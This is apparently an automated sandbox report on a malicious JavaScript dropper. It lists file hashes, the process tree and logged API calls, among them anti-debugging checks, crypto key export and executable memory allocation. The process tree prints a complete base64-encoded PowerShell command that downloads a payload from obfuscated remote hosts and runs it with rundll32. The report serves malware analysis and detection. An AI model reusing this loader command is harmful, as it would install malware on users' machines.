Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 24, 2023, 11:04 a.m.	May 24, 2023, 11:06 a.m.

Size	200.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`f5dfea277631d928a0df5399fdc8a138`
SHA256	`e73a5f8982cb2478d54f10ea50e06946f783039e560dfda16ab2b514cd2e326c`
CRC32	`832A4D4A`
ssdeep	`3072:Q0eOWt4D6hMWE55AOLqQktkod8YzEGtGutOiir/R9EJnG0iyj3hNGAqC3oqXspjH:heOtJCO09bd16qbQFp`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\untrimming.js
1460
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\Uncoupler.js" Superornamentally sapphicSloggers Tencteri
  2560
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQB1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA=="
    2680

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 24, 2023, 11:05 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005429b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005432b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00543378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00542f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 24, 2023, 11:05 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 134 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
